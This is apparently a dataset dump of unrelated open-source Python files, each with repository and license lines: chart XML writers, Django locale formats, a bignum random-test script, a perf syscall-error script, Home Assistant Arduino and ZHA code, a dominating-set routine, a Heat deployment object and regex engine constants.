'value': value,
})
return xml
@property
def _val_tmpl(self):
"""
The template for the ``<c:val>`` element for this series, containing
the series values and their spreadsheet range reference.
"""
return (
' <c:val{nsdecls}>\n'
' <c:numRef>\n'
' <c:f>{values_ref}</c:f>\n'
' <c:numCache>\n'
' <c:formatCode>{number_format}</c:formatCode>\n'
' <c:ptCount val="{val_count}"/>\n'
'{val_pt_xml}'
' </c:numCache>\n'
' </c:numRef>\n'
' </c:val>\n'
)
class _XySeriesXmlWriter(_BaseSeriesXmlWriter):
"""
Generates XML snippets particular to an XY series.
"""
@property
def xVal(self):
"""
Return the ``<c:xVal>`` element for this series as an oxml element.
This element contains the X values for this series.
"""
xml = self._xVal_tmpl.format(**{
'nsdecls': ' %s' % nsdecls('c'),
'numRef_xml': self.numRef_xml(
self._series.x_values_ref, self._series.number_format,
self._series.x_values
),
})
return parse_xml(xml)
@property
def xVal_xml(self):
"""
Return the ``<c:xVal>`` element for this series as unicode text. This
element contains the X values for this series.
"""
return self._xVal_tmpl.format(**{
'nsdecls': '',
'numRef_xml': self.numRef_xml(
self._series.x_values_ref, self._series.number_format,
self._series.x_values
),
})
@property
def yVal(self):
"""
Return the ``<c:yVal>`` element for this series as an oxml element.
This element contains the Y values for this series.
"""
xml = self._yVal_tmpl.format(**{
'nsdecls': ' %s' % nsdecls('c'),
'numRef_xml': self.numRef_xml(
self._series.y_values_ref, self._series.number_format,
self._series.y_values
),
})
return parse_xml(xml)
@property
def yVal_xml(self):
"""
Return the ``<c:yVal>`` element for this series as unicode text. This
element contains the Y values for this series.
"""
return self._yVal_tmpl.format(**{
'nsdecls': '',
'numRef_xml': self.numRef_xml(
self._series.y_values_ref, self._series.number_format,
self._series.y_values
),
})
@property
def _xVal_tmpl(self):
"""
The template for the ``<c:xVal>`` element for this series, containing
the X values and their spreadsheet range reference.
"""
return (
' <c:xVal{nsdecls}>\n'
'{numRef_xml}'
' </c:xVal>\n'
)
@property
def _yVal_tmpl(self):
"""
The template for the ``<c:yVal>`` element for this series, containing
the Y values and their spreadsheet range reference.
"""
return (
' <c:yVal{nsdecls}>\n'
'{numRef_xml}'
' </c:yVal>\n'
)
class _BubbleSeriesXmlWriter(_XySeriesXmlWriter):
"""
Generates XML snippets particular to a bubble chart series.
"""
@property
def bubbleSize(self):
"""
Return the ``<c:bubbleSize>`` element for this series as an oxml
element. This element contains the bubble size values for this
series.
"""
xml = self._bubbleSize_tmpl.format(**{
'nsdecls': ' %s' % nsdecls('c'),
'numRef_xml': self.numRef_xml(
self._series.bubble_sizes_ref, self._series.number_format,
self._series.bubble_sizes
),
})
return parse_xml(xml)
@property
def bubbleSize_xml(self):
"""
Return the ``<c:bubbleSize>`` element for this series as unicode
text. This element contains the bubble size values for all the
data points in the chart.
"""
return self._bubbleSize_tmpl.format(**{
'nsdecls': '',
'numRef_xml': self.numRef_xml(
self._series.bubble_sizes_ref, self._series.number_format,
self._series.bubble_sizes
),
})
@property
def _bubbleSize_tmpl(self):
"""
The template for the ``<c:bubbleSize>`` element for this series,
containing the bubble size values and their spreadsheet range
reference.
"""
return (
' <c:bubbleSize{nsdecls}>\n'
'{numRef_xml}'
' </c:bubbleSize>\n'
)
class _BubbleSeriesXmlRewriter(_BaseSeriesXmlRewriter):
"""
A series rewriter suitable for bubble charts.
"""
def _rewrite_ser_data(self, ser, series_data, date_1904):
"""
Rewrite the ``<c:tx>``, ``<c:cat>`` and ``<c:val>`` child elements
of *ser* based on the values in *series_data*.
"""
ser._remove_tx()
ser._remove_xVal()
ser._remove_yVal()
ser._remove_bubbleSize()
xml_writer = _BubbleSeriesXmlWriter(series_data)
ser._insert_tx(xml_writer.tx)
ser._insert_xVal(xml_writer.xVal)
ser._insert_yVal(xml_writer.yVal)
ser._insert_bubbleSize(xml_writer.bubbleSize)
class _CategorySeriesXmlRewriter(_BaseSeriesXmlRewriter):
"""
A series rewriter suitable for category charts.
"""
def _rewrite_ser_data(self, ser, series_data, date_1904):
"""
Rewrite the ``<c:tx>``, ``<c:cat>`` and ``<c:val>`` child elements
of *ser* based on the values in *series_data*.
"""
ser._remove_tx()
ser._remove_cat()
ser._remove_val()
xml_writer = _CategorySeriesXmlWriter(series_data, date_1904)
ser._insert_tx(xml_writer.tx)
ser._insert_cat(xml_writer.cat)
ser._insert_val(xml_writer.val)
class _XySeriesXmlRewriter(_BaseSeriesXmlRewriter):
"""
A series rewriter suitable for XY (aka. scatter) charts.
"""
def _rewrite_ser_data(self, ser, series_data, date_1904):
"""
Rewrite the ``<c:tx>``, ``<c:xVal>`` and ``<c:yVal>`` child elements
of *ser* based on the values in *series_data*.
"""
ser._remove_tx()
ser._remove_xVal()
ser._remove_yVal()
xml_writer = _XySeriesXmlWriter(series_data)
ser._insert_tx(xml_writer.tx)
ser._insert_xVal(xml_writer.xVal)
ser._insert_yVal(xml_writer.yVal)
|
apache-2.0
|
towerjoo/DjangoNotes
|
Django-1.5.1/django/conf/locale/nb/formats.py
|
107
|
1585
|
# -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'd.m.Y'
SHORT_DATETIME_FORMAT = 'd.m.Y H:i'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = (
'%Y-%m-%d', '%d.%m.%Y', '%d.%m.%y', # '2006-10-25', '25.10.2006', '25.10.06'
# '%d. %b %Y', '%d %b %Y', # '25. okt 2006', '25 okt 2006'
# '%d. %b. %Y', '%d %b. %Y', # '25. okt. 2006', '25 okt. 2006'
# '%d. %B %Y', '%d %B %Y', # '25. oktober 2006', '25 oktober 2006'
)
DATETIME_INPUT_FORMATS = (
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y', # '25.10.06'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '\xa0' # non-breaking space
NUMBER_GROUPING = 3
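# Illustrative check (not part of the original settings module): each input
# format is a strftime/strptime pattern, e.g. the first DATETIME_INPUT_FORMATS
# entry round-trips an ISO-style timestamp.
def _example_parse():
    from datetime import datetime
    return datetime.strptime('2006-10-25 14:30:59', DATETIME_INPUT_FORMATS[0])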
|
mit
|
kokke/tiny-bignum-c
|
scripts/test_rand.py
|
1
|
4619
|
#
#
# Can take one command-line parameter: number of tests to run
#
# Runs NTESTS random tests of selecting an operand from + - *
# and applying it on two random operands and comparing the result
# to the one Python can calculate
#
# In effect, this verifies the C implementation against Python's
#
#
from random import Random, choice
import subprocess
import sys
import os
import math
TEST_BINARY = "./build/test_random"
def run_shell(runthis):
""" Helper, runs a command string as if given to the shell """
#print("trying to run '%s'" % runthis)
osstdout = subprocess.Popen(runthis, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
theInfo = osstdout.communicate()[0].strip()
#return (theInfo, osstdout.returncode)
return osstdout.returncode
# Check for command-line arguments - default to 100 tests
if len(sys.argv) == 2:
NTESTS = int(sys.argv[1])
else:
NTESTS = 100
# Give the operands names
ADD = 0
SUB = 1
MUL = 2
DIV = 3
AND = 4
OR = 5
XOR = 6
POW = 7
MOD = 8
RSHIFT = 9
LSHIFT = 10
ISQRT = 11
NUM_OPERATIONS = 12 # this variable should be 1 larger than the last supported operation ^^
# Instantiate object of Random-class for choosing an operand and two operators
rand = Random()
# List of command-strings leading to failures - expected to be empty if no bugs are triggered
failures = list()
print("\nRunning %d random tests (parsed using from_string):\n" % NTESTS)
# Iterate NTESTS times
i = 0
while i < NTESTS:
i += 1
# Choose random operand
while 1:
operation = choice(range(NUM_OPERATIONS))
if operation != POW:
break
expected = 0
# Generate two large operators
if operation in [LSHIFT, RSHIFT]:
oper1 = rand.randint(0, 0xFF)
oper2 = rand.randint(0, 32)
else:
oper1 = rand.randint(0, 0xFFFFFF)
oper2 = rand.randint(0, 0xFFFFFF)
# Calculate expected value
if operation == ADD:
expected = oper1 + oper2
elif operation == SUB:
# bignum only supports unsigned, so if B > A
# we swap operands to avoid the underflow / wrap-around
if oper2 > oper1:
tmp = oper1
oper1 = oper2
oper2 = tmp
expected = oper1 - oper2
elif operation == MUL:
expected = oper1 * oper2
elif operation == DIV:
if oper2 > oper1:
tmp = oper1
oper1 = oper2
oper2 = tmp
# avoid dividing by 0
if oper2 == 0:
oper2 += 1
        expected = oper1 // oper2  # integer (floor) division; '/' would yield a float under Python 3
elif operation == AND:
expected = oper1 & oper2
elif operation == OR:
expected = oper1 | oper2
elif operation == XOR:
expected = oper1 ^ oper2
elif operation == POW:
expected = oper1 ** oper2
elif operation == MOD:
# avoid dividing by 0
if oper2 == 0:
oper2 += 1
expected = oper1 % oper2
elif operation == LSHIFT:
expected = oper1 << oper2
elif operation == RSHIFT:
expected = oper1 >> oper2
elif operation == ISQRT:
        expected = int(math.sqrt(oper1))
# Convert to string to pass to C program
# NOTE: bignum_from_string requires hex format and even no. of chars in str
oper1 = "%.0x" % oper1
oper2 = "%.0x" % oper2
expected = "%.0x" % expected
    # bignum_from_string requires the string length to be a multiple of the
    # word size (16 hex characters here), so we zero-pad up to that boundary
while (len(oper1) & 15) != 0:
oper1 = "0" + oper1
while (len(oper2) & 15) != 0:
oper2 = "0" + oper2
while (len(expected) & 15) != 0:
expected = "0" + expected
# Create the command-string to run in shell
cmd_string = "%s %s %s %s %s" % (TEST_BINARY, operation, oper1, oper2, expected)
if len([e for e in cmd_string.split(" ") if e]) < 5:
# something has gone wrong with making the command-string - abort and retry
i -= 1
continue
# Expect return code to be ZERO for successful comparison
success = (0 == run_shell(cmd_string))
# Add command-string to list in case of failure
    # this allows the user to re-create the failure
if not success:
failures.append(cmd_string)
sys.stdout.write("x")
try:
f = open("error_log.txt", "a+")
f.write(cmd_string + os.linesep)
f.close()
except:
import traceback
print("\n\nEXCEPTION:\n\n" + traceback.format_exc())
else:
sys.stdout.write(".")
sys.stdout.flush()
sys.stdout.write("\n")
# After running the tests, give user feedback
print("")
print("%d/%d random tests passed." % (NTESTS - len(failures), NTESTS))
print("")
# Output the commands leading to failure, if any occurred:
if len(failures) > 0:
print("")
print("\n".join(failures))
print("")
|
unlicense
|
gq213/linux-3.10.72
|
tools/perf/scripts/python/failed-syscalls-by-pid.py
|
11180
|
2058
|
# failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
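# Illustrative shape of the accumulator (not part of the original script): after a
# failed read() (syscall id 0 on x86_64) by pid 1234 of "bash" returning -EBADF,
# the counter lives at syscalls["bash"][1234][0][-9]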
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
|
gpl-2.0
|
devdelay/home-assistant
|
homeassistant/components/arduino.py
|
7
|
3724
|
"""
Support for Arduino boards running with the Firmata firmware.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/arduino/
"""
import logging
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers import validate_config
DOMAIN = "arduino"
REQUIREMENTS = ['PyMata==2.12']
BOARD = None
_LOGGER = logging.getLogger(__name__)
def setup(hass, config):
"""Setup the Arduino component."""
if not validate_config(config,
{DOMAIN: ['port']},
_LOGGER):
return False
import serial
global BOARD
try:
BOARD = ArduinoBoard(config[DOMAIN]['port'])
except (serial.serialutil.SerialException, FileNotFoundError):
_LOGGER.exception("Your port is not accessible.")
return False
if BOARD.get_firmata()[1] <= 2:
_LOGGER.error("The StandardFirmata sketch should be 2.2 or newer.")
return False
def stop_arduino(event):
"""Stop the Arduino service."""
BOARD.disconnect()
def start_arduino(event):
"""Start the Arduino service."""
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_arduino)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, start_arduino)
return True
class ArduinoBoard(object):
"""Representation of an Arduino board."""
def __init__(self, port):
"""Initialize the board."""
from PyMata.pymata import PyMata
self._port = port
self._board = PyMata(self._port, verbose=False)
def set_mode(self, pin, direction, mode):
"""Set the mode and the direction of a given pin."""
if mode == 'analog' and direction == 'in':
self._board.set_pin_mode(pin,
self._board.INPUT,
self._board.ANALOG)
elif mode == 'analog' and direction == 'out':
self._board.set_pin_mode(pin,
self._board.OUTPUT,
self._board.ANALOG)
elif mode == 'digital' and direction == 'in':
self._board.set_pin_mode(pin,
self._board.INPUT,
self._board.DIGITAL)
elif mode == 'digital' and direction == 'out':
self._board.set_pin_mode(pin,
self._board.OUTPUT,
self._board.DIGITAL)
elif mode == 'pwm':
self._board.set_pin_mode(pin,
self._board.OUTPUT,
self._board.PWM)
def get_analog_inputs(self):
"""Get the values from the pins."""
self._board.capability_query()
return self._board.get_analog_response_table()
def set_digital_out_high(self, pin):
"""Set a given digital pin to high."""
self._board.digital_write(pin, 1)
def set_digital_out_low(self, pin):
"""Set a given digital pin to low."""
self._board.digital_write(pin, 0)
def get_digital_in(self, pin):
"""Get the value from a given digital pin."""
self._board.digital_read(pin)
def get_analog_in(self, pin):
"""Get the value from a given analog pin."""
self._board.analog_read(pin)
def get_firmata(self):
"""Return the version of the Firmata firmware."""
return self._board.get_firmata_version()
def disconnect(self):
"""Disconnect the board and close the serial connection."""
self._board.reset()
self._board.close()
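# Illustrative configuration.yaml snippet this component expects (assumed example;
# the serial device path is hypothetical):
#   arduino:
#     port: /dev/ttyACM0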
|
mit
|
partofthething/home-assistant
|
tests/components/zha/test_device_tracker.py
|
21
|
3026
|
"""Test ZHA Device Tracker."""
from datetime import timedelta
import time
import pytest
import zigpy.zcl.clusters.general as general
from homeassistant.components.device_tracker import DOMAIN, SOURCE_TYPE_ROUTER
from homeassistant.components.zha.core.registries import (
SMARTTHINGS_ARRIVAL_SENSOR_DEVICE_TYPE,
)
from homeassistant.const import STATE_HOME, STATE_NOT_HOME, STATE_UNAVAILABLE
import homeassistant.util.dt as dt_util
from .common import (
async_enable_traffic,
async_test_rejoin,
find_entity_id,
send_attributes_report,
)
from tests.common import async_fire_time_changed
@pytest.fixture
def zigpy_device_dt(zigpy_device_mock):
"""Device tracker zigpy device."""
endpoints = {
1: {
"in_clusters": [
general.Basic.cluster_id,
general.PowerConfiguration.cluster_id,
general.Identify.cluster_id,
general.PollControl.cluster_id,
general.BinaryInput.cluster_id,
],
"out_clusters": [general.Identify.cluster_id, general.Ota.cluster_id],
"device_type": SMARTTHINGS_ARRIVAL_SENSOR_DEVICE_TYPE,
}
}
return zigpy_device_mock(endpoints)
async def test_device_tracker(hass, zha_device_joined_restored, zigpy_device_dt):
"""Test zha device tracker platform."""
zha_device = await zha_device_joined_restored(zigpy_device_dt)
cluster = zigpy_device_dt.endpoints.get(1).power
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
assert entity_id is not None
assert hass.states.get(entity_id).state == STATE_HOME
await async_enable_traffic(hass, [zha_device], enabled=False)
# test that the device tracker was created and that it is unavailable
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
zigpy_device_dt.last_seen = time.time() - 120
next_update = dt_util.utcnow() + timedelta(seconds=30)
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
# allow traffic to flow through the gateway and device
await async_enable_traffic(hass, [zha_device])
# test that the state has changed from unavailable to not home
assert hass.states.get(entity_id).state == STATE_NOT_HOME
    # flip the state back to home
await send_attributes_report(
hass, cluster, {0x0000: 0, 0x0020: 23, 0x0021: 200, 0x0001: 2}
)
zigpy_device_dt.last_seen = time.time() + 10
next_update = dt_util.utcnow() + timedelta(seconds=30)
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_HOME
entity = hass.data[DOMAIN].get_entity(entity_id)
assert entity.is_connected is True
assert entity.source_type == SOURCE_TYPE_ROUTER
assert entity.battery_level == 100
# test adding device tracker to the network and HA
await async_test_rejoin(hass, zigpy_device_dt, [cluster], (2,))
assert hass.states.get(entity_id).state == STATE_HOME
|
mit
|
rionbr/CANA
|
cana/control/mds.py
|
1
|
1888
|
# -*- coding: utf-8 -*-
"""
Minimum Dominating Set
=======================
"""
# Copyright (C) 2021 by
# Alex Gates <[email protected]>
# Rion Brattig Correia <[email protected]>
# All rights reserved.
# MIT license.
import itertools
#
# Minimum Dominating Set
#
def mds(directed_graph, max_search=5, keep_self_loops=True):
"""The minimum dominating set method.
Args:
directed_graph (networkx.DiGraph) : The structural graph.
max_search (int) : Maximum search of additional variables. Defaults to 5.
keep_self_loops (bool) : If self-loops are used in the computation.
Returns:
(list) : A list of sets with the driver nodes.
"""
N = len(directed_graph)
root_var = _root_variables(directed_graph, keep_self_loops=keep_self_loops)
if len(_get_dominated_set(directed_graph, root_var)) == N:
return [root_var]
else:
MDS_sets = []
nonroot_variables = set(directed_graph.nodes()) - set(root_var)
for num_additional_var in range(1, max_search):
for an_combo in itertools.combinations(nonroot_variables, num_additional_var):
possible_dvs = root_var.union(an_combo)
if len(_get_dominated_set(directed_graph, possible_dvs)) == N:
MDS_sets.append(possible_dvs)
if len(MDS_sets) > 0:
break
return MDS_sets
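# Illustrative usage sketch (not part of the original module; assumes networkx):
#   import networkx as nx
#   g = nx.DiGraph([(1, 2), (1, 3), (4, 3)])
#   driver_sets = mds(g)   # [{1, 4}] -- the two root nodes already dominate every node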
def _get_dominated_set(directed_graph, dominatingset):
"""
TODO
"""
dominatedset = set(dominatingset)
for dn in dominatingset:
dominatedset.update(directed_graph.neighbors(dn))
return dominatedset
def _root_variables(directed_graph, keep_self_loops=True):
"""
"""
return set([n for n in directed_graph.nodes()
if (directed_graph.in_degree(n) == 0) or ((not keep_self_loops) and (directed_graph.neighbors(n) == [n]))])
|
mit
|
takeshineshiro/heat
|
heat/objects/software_deployment.py
|
5
|
3374
|
# Copyright 2014 Intel Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SoftwareDeployment object
"""
from oslo_versionedobjects import base
from oslo_versionedobjects import fields
from heat.db import api as db_api
from heat.objects import fields as heat_fields
from heat.objects import software_config
class SoftwareDeployment(base.VersionedObject,
base.VersionedObjectDictCompat,
base.ComparableVersionedObject):
fields = {
'id': fields.StringField(),
'config_id': fields.StringField(),
'server_id': fields.StringField(),
'input_values': heat_fields.JsonField(nullable=True),
'output_values': heat_fields.JsonField(nullable=True),
'tenant': fields.StringField(),
'stack_user_project_id': fields.StringField(nullable=True),
'action': fields.StringField(nullable=True),
'status': fields.StringField(nullable=True),
'status_reason': fields.StringField(nullable=True),
'config': fields.ObjectField('SoftwareConfig'),
'created_at': fields.DateTimeField(read_only=True),
'updated_at': fields.DateTimeField(nullable=True),
}
@staticmethod
def _from_db_object(context, deployment, db_deployment):
for field in deployment.fields:
if field == 'config':
deployment[field] = (
software_config.SoftwareConfig._from_db_object(
context, software_config.SoftwareConfig(),
db_deployment['config'])
)
else:
deployment[field] = db_deployment[field]
deployment._context = context
deployment.obj_reset_changes()
return deployment
@classmethod
def create(cls, context, values):
return cls._from_db_object(
context, cls(), db_api.software_deployment_create(context, values))
@classmethod
def get_by_id(cls, context, deployment_id):
return cls._from_db_object(
context, cls(),
db_api.software_deployment_get(context, deployment_id))
@classmethod
def get_all(cls, context, server_id=None):
return [cls._from_db_object(context, cls(), db_deployment)
for db_deployment in db_api.software_deployment_get_all(
context, server_id)]
@classmethod
def update_by_id(cls, context, deployment_id, values):
"""Note this is a bit unusual as it returns the object.
Other update_by_id methods return a bool (was it updated).
"""
return cls._from_db_object(
context, cls(),
db_api.software_deployment_update(context, deployment_id, values))
@classmethod
def delete(cls, context, deployment_id):
db_api.software_deployment_delete(context, deployment_id)
|
apache-2.0
|
eort/OpenSesame
|
libqtopensesame/runners/__init__.py
|
2
|
1045
|
#-*- coding:utf-8 -*-
"""
This file is part of OpenSesame.
OpenSesame is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenSesame is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenSesame. If not, see <http://www.gnu.org/licenses/>.
"""
from libopensesame.py3compat import *
from libqtopensesame.runners.base_runner import base_runner
from libqtopensesame.runners.inprocess_runner import inprocess_runner
from libqtopensesame.runners.external_runner import external_runner
from libqtopensesame.runners.multiprocess_runner import multiprocess_runner
runner_list = ['inprocess', 'external', 'multiprocess']
|
gpl-3.0
|
Event38/MissionPlanner
|
Lib/sre_constants.py
|
64
|
7398
|
#
# Secret Labs' Regular Expression Engine
#
# various symbols used by the regular expression engine.
# run this script to update the _sre include files!
#
# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved.
#
# See the sre.py file for information on usage and redistribution.
#
"""Internal support module for sre"""
# update when constants are added or removed
MAGIC = 20031017
# max code word in this release
MAXREPEAT = 65535
# SRE standard exception (access as sre.error)
# should this really be here?
class error(Exception):
pass
# operators
FAILURE = "failure"
SUCCESS = "success"
ANY = "any"
ANY_ALL = "any_all"
ASSERT = "assert"
ASSERT_NOT = "assert_not"
AT = "at"
BIGCHARSET = "bigcharset"
BRANCH = "branch"
CALL = "call"
CATEGORY = "category"
CHARSET = "charset"
GROUPREF = "groupref"
GROUPREF_IGNORE = "groupref_ignore"
GROUPREF_EXISTS = "groupref_exists"
IN = "in"
IN_IGNORE = "in_ignore"
INFO = "info"
JUMP = "jump"
LITERAL = "literal"
LITERAL_IGNORE = "literal_ignore"
MARK = "mark"
MAX_REPEAT = "max_repeat"
MAX_UNTIL = "max_until"
MIN_REPEAT = "min_repeat"
MIN_UNTIL = "min_until"
NEGATE = "negate"
NOT_LITERAL = "not_literal"
NOT_LITERAL_IGNORE = "not_literal_ignore"
RANGE = "range"
REPEAT = "repeat"
REPEAT_ONE = "repeat_one"
SUBPATTERN = "subpattern"
MIN_REPEAT_ONE = "min_repeat_one"
# positions
AT_BEGINNING = "at_beginning"
AT_BEGINNING_LINE = "at_beginning_line"
AT_BEGINNING_STRING = "at_beginning_string"
AT_BOUNDARY = "at_boundary"
AT_NON_BOUNDARY = "at_non_boundary"
AT_END = "at_end"
AT_END_LINE = "at_end_line"
AT_END_STRING = "at_end_string"
AT_LOC_BOUNDARY = "at_loc_boundary"
AT_LOC_NON_BOUNDARY = "at_loc_non_boundary"
AT_UNI_BOUNDARY = "at_uni_boundary"
AT_UNI_NON_BOUNDARY = "at_uni_non_boundary"
# categories
CATEGORY_DIGIT = "category_digit"
CATEGORY_NOT_DIGIT = "category_not_digit"
CATEGORY_SPACE = "category_space"
CATEGORY_NOT_SPACE = "category_not_space"
CATEGORY_WORD = "category_word"
CATEGORY_NOT_WORD = "category_not_word"
CATEGORY_LINEBREAK = "category_linebreak"
CATEGORY_NOT_LINEBREAK = "category_not_linebreak"
CATEGORY_LOC_WORD = "category_loc_word"
CATEGORY_LOC_NOT_WORD = "category_loc_not_word"
CATEGORY_UNI_DIGIT = "category_uni_digit"
CATEGORY_UNI_NOT_DIGIT = "category_uni_not_digit"
CATEGORY_UNI_SPACE = "category_uni_space"
CATEGORY_UNI_NOT_SPACE = "category_uni_not_space"
CATEGORY_UNI_WORD = "category_uni_word"
CATEGORY_UNI_NOT_WORD = "category_uni_not_word"
CATEGORY_UNI_LINEBREAK = "category_uni_linebreak"
CATEGORY_UNI_NOT_LINEBREAK = "category_uni_not_linebreak"
OPCODES = [
# failure=0 success=1 (just because it looks better that way :-)
FAILURE, SUCCESS,
ANY, ANY_ALL,
ASSERT, ASSERT_NOT,
AT,
BRANCH,
CALL,
CATEGORY,
CHARSET, BIGCHARSET,
GROUPREF, GROUPREF_EXISTS, GROUPREF_IGNORE,
IN, IN_IGNORE,
INFO,
JUMP,
LITERAL, LITERAL_IGNORE,
MARK,
MAX_UNTIL,
MIN_UNTIL,
NOT_LITERAL, NOT_LITERAL_IGNORE,
NEGATE,
RANGE,
REPEAT,
REPEAT_ONE,
SUBPATTERN,
MIN_REPEAT_ONE
]
ATCODES = [
AT_BEGINNING, AT_BEGINNING_LINE, AT_BEGINNING_STRING, AT_BOUNDARY,
AT_NON_BOUNDARY, AT_END, AT_END_LINE, AT_END_STRING,
AT_LOC_BOUNDARY, AT_LOC_NON_BOUNDARY, AT_UNI_BOUNDARY,
AT_UNI_NON_BOUNDARY
]
CHCODES = [
CATEGORY_DIGIT, CATEGORY_NOT_DIGIT, CATEGORY_SPACE,
CATEGORY_NOT_SPACE, CATEGORY_WORD, CATEGORY_NOT_WORD,
CATEGORY_LINEBREAK, CATEGORY_NOT_LINEBREAK, CATEGORY_LOC_WORD,
CATEGORY_LOC_NOT_WORD, CATEGORY_UNI_DIGIT, CATEGORY_UNI_NOT_DIGIT,
CATEGORY_UNI_SPACE, CATEGORY_UNI_NOT_SPACE, CATEGORY_UNI_WORD,
CATEGORY_UNI_NOT_WORD, CATEGORY_UNI_LINEBREAK,
CATEGORY_UNI_NOT_LINEBREAK
]
def makedict(list):
d = {}
i = 0
for item in list:
d[item] = i
i = i + 1
return d
OPCODES = makedict(OPCODES)
ATCODES = makedict(ATCODES)
CHCODES = makedict(CHCODES)
# replacement operations for "ignore case" mode
OP_IGNORE = {
GROUPREF: GROUPREF_IGNORE,
IN: IN_IGNORE,
LITERAL: LITERAL_IGNORE,
NOT_LITERAL: NOT_LITERAL_IGNORE
}
AT_MULTILINE = {
AT_BEGINNING: AT_BEGINNING_LINE,
AT_END: AT_END_LINE
}
AT_LOCALE = {
AT_BOUNDARY: AT_LOC_BOUNDARY,
AT_NON_BOUNDARY: AT_LOC_NON_BOUNDARY
}
AT_UNICODE = {
AT_BOUNDARY: AT_UNI_BOUNDARY,
AT_NON_BOUNDARY: AT_UNI_NON_BOUNDARY
}
CH_LOCALE = {
CATEGORY_DIGIT: CATEGORY_DIGIT,
CATEGORY_NOT_DIGIT: CATEGORY_NOT_DIGIT,
CATEGORY_SPACE: CATEGORY_SPACE,
CATEGORY_NOT_SPACE: CATEGORY_NOT_SPACE,
CATEGORY_WORD: CATEGORY_LOC_WORD,
CATEGORY_NOT_WORD: CATEGORY_LOC_NOT_WORD,
CATEGORY_LINEBREAK: CATEGORY_LINEBREAK,
CATEGORY_NOT_LINEBREAK: CATEGORY_NOT_LINEBREAK
}
CH_UNICODE = {
CATEGORY_DIGIT: CATEGORY_UNI_DIGIT,
CATEGORY_NOT_DIGIT: CATEGORY_UNI_NOT_DIGIT,
CATEGORY_SPACE: CATEGORY_UNI_SPACE,
CATEGORY_NOT_SPACE: CATEGORY_UNI_NOT_SPACE,
CATEGORY_WORD: CATEGORY_UNI_WORD,
CATEGORY_NOT_WORD: CATEGORY_UNI_NOT_WORD,
CATEGORY_LINEBREAK: CATEGORY_UNI_LINEBREAK,
CATEGORY_NOT_LINEBREAK: CATEGORY_UNI_NOT_LINEBREAK
}
# flags
SRE_FLAG_TEMPLATE = 1 # template mode (disable backtracking)
SRE_FLAG_IGNORECASE = 2 # case insensitive
SRE_FLAG_LOCALE = 4 # honour system locale
